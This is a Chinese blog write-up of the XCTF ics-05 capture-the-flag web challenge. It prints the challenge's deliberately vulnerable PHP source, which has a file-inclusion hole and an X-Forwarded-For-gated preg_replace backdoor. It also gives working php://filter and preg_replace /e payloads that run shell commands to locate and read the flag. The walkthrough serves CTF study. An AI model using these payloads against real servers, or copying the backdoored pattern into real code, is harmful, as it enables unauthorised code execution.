攻防世界 ics-05

已于 2022-01-26 18:17:55 修改
阅读量929 收藏
点赞数
分类专栏: 攻防世界 文章标签: web
于 2022-01-26 18:16:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/122706641
版权

ics-05

最佳Writeup由划水大队——Mke • Mke2fs提供

难度系数:

题目来源: XCTF 4th-CyberEarth

题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

审题,打开网页后直接找到设备维修中心

点击一下云平台设备维修中心

发现上方GET进去了一个page,想到利用伪协议来得到全部的代码详情

Base64解密得到

<?php

error_reporting(0);


@session_start();

posix_setuid(1000);



?>

<!DOCTYPE HTML>

<html>


<head>

    <meta charset="utf-8">

    <meta name="renderer" content="webkit">

    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <link rel="stylesheet" href="layui/css/layui.css" media="all">

    <title>设备维护中心</title>

    <meta charset="utf-8">

</head>


<body>

    <ul class="layui-nav">

        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>

    </ul>

    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">

        <legend>设备列表</legend>

    </fieldset>

    <table class="layui-hide" id="test"></table>

    <script type="text/html" id="switchTpl">

        <!-- 这里的 checked 的状态只是演示 -->

        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>

    </script>

    <script src="layui/layui.js" charset="utf-8"></script>

    <script>

    layui.use('table', function() {

        var table = layui.table,

            form = layui.form;


        table.render({

            elem: '#test',

            url: '/somrthing.json',

            cellMinWidth: 80,

            cols: [

                [

                    { type: 'numbers' },

                     { type: 'checkbox' },

                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },

                     { field: 'name', title: '设备名', templet: '#nameTpl' },

                     { field: 'area', title: '区域' },

                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },

                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }

                ]

            ],

            page: true

        });

    });

    </script>

    <script>

    layui.use('element', function() {

        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块

        //监听导航点击

        element.on('nav(demo)', function(elem) {

            //console.log(elem)

            layer.msg(elem.text());

        });

    });

    </script>


<?php


$page = $_GET[page];


if (isset($page)) {




if (ctype_alnum($page)) {

?>


    <br /><br /><br /><br />

    <div style="text-align:center">

        <p class="lead"><?php echo $page; die();?></p>

    <br /><br /><br /><br />


<?php


}else{


?>

        <br /><br /><br /><br />

        <div style="text-align:center">

            <p class="lead">

                <?php


                if (strpos($page, 'input') > 0) {

                    die();

                }


                if (strpos($page, 'ta:text') > 0) {

                    die();

                }


                if (strpos($page, 'text') > 0) {

                    die();

                }


                if ($page === 'index.php') {

                    die('Ok');

                }

                    include($page);

                    die();

                ?>

        </p>

        <br /><br /><br /><br />


<?php

}}



//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试


if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {


    echo "<br >Welcome My Admin ! <br >";


    $pattern = $_GET[pat];

    $replacement = $_GET[rep];

    $subject = $_GET[sub];


    if (isset($pattern) && isset($replacement) && isset($subject)) {

        preg_replace($pattern, $replacement, $subject);

    }else{

        die();

    }


}






?>
</body>


</html>

主要观察最后一部分代码

<?php

}}



//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试


if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {


    echo "<br >Welcome My Admin ! <br >";


    $pattern = $_GET[pat];

    $replacement = $_GET[rep];

    $subject = $_GET[sub];


    if (isset($pattern) && isset($replacement) && isset($subject)) {

        preg_replace($pattern, $replacement, $subject);

    }else{

        die();

    }


}

?>

语法:

preg_replace 函数执行一个正则表达式的搜索和替换。

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。

并且PHP 的 preg_replace()函数存在一个安全问题:

/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

抓包然后一步一步来,绕过空格可以用%20、%06、+代替

方法一:(用find来直接查找flag)

?pat=/123/e&rep=system("find+-iname+flag")&sub=123

?pat=/123/e&rep=system("cd+./s3chahahaDir/flag%26%26ls")&sub=123

?pat=/12/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=12

方法二:(先查看当前目录,然后一直往下进行)

?pat=/12/e&rep=system("ls")&sub=12

看到其中的s3chahahaDir,于是进入s3chahahaDir目录然后再ls,

f0njl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【愚公系列】2023年05攻防世界-Webics-05
时光隧道
05-26 7776
preg_replace 函数是一个正则表达式替换函数,它可以在字符串中执行搜索和替换操作。其中,$pattern是一个正则表达式,是要替换的字符串或字符串数组,$subject是要搜索和替换的原始字符串。使用了不安全的正则表达式:有些正则表达式可能会导致漏洞。例如,使用未经转义的特殊字符,如反斜杠、圆括号和方括号等,可能导致语法错误或意外的行为。使用用户提供的数据作为正则表达式或替换字符串:如果不正确地处理用户提供的数据,攻击者可能会注入恶意代码,导致代码执行或任意文件读取。
攻防世界——ics-05
m0_62063669的博客
06-21 2234
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
[XCTF_网络安全] 攻防世界 ics-05 解题详析
最新发布
qingkahui24689的博客
05-24 559
[XCTF_网络安全] 攻防世界 ics-05 解题详析,该题考察XFF及/e修正符的相关知识。
攻防世界-web-ics-05
wuh2333的博客
07-12 469
攻防世界ics,命令注入
攻防世界web——ics05
manerzi的博客
10-24 873
攻防世界web——ics05
攻防世界ics-05
wangzhemvp的博客
04-05 651
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。使用 /e 修饰符,preg_replace 会将 replacement 参数当作 PHP 代码执行。php://filter 伪协议查看源码 + preg_replace 函数漏洞。1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。page=index 输入什么显示什么,有回显。用php://filter读取网页源代码。
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界hit-the-core,杂项misc
11-01
攻防世界hit-the-core,杂项misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127626829
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 1549
攻防世界-ics-05-(详细操作)做题笔记
攻防世界ics-05(PHP伪协议+代码审计+Linux指令)
2302_79800344的博客
04-08 1270
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 740
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1086
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
攻防世界-ics-05
m0_62094846的博客
11-17 2137
点开后发现只有设备维护中心可以点开 看到数据端口请求异常,先想到用burp修改域名,但是修改后 除了加了一句话没什么用 看看源代码,有page=index(看wp的,真想不到和文件包含有关) ?page=php://filter/read=convert.base64-encode/resource=index.php 应该是base64 <?php error_reporting(0); @session_start(); posix_setuid(1...
攻防世界web进阶区ics-05详解
hxhxhxhxx的博客
08-06 3110
攻防世界web进阶区ics-05详解题目解法 题目 我们只能点击一个地方 解法 御剑扫描有一个css的文件 没有什么作用 发现又点了一次的时候,url发生了改变 因为是php的页面,我们试试php伪协议读取文件 http://220.249.52.133:39554/index.php?page=php://filter/read=convert.base64-encode/resource=index.php <?php error_reporting(0); @session_s
攻防世界】十七、ics-05
Hi~ 土拨鼠
10-12 1957
步骤 打开题目场景,根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数: 而且参数的内容还会在页面之中显示,尝试看有没有xss,失败: 看来不是这方面的考题,尝试输入index.php,发现返回Ok: 这里还没有看出来是啥,然后又尝试输入index.html,这才恍然大悟这块有文件包含: 既然是文件包含我们就尝试来利用它,尝试使用伪协议php://,它包含两个子协议,功能不同。.
攻防世界ics-06
08-12
- *2* *3* [攻防世界Webics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值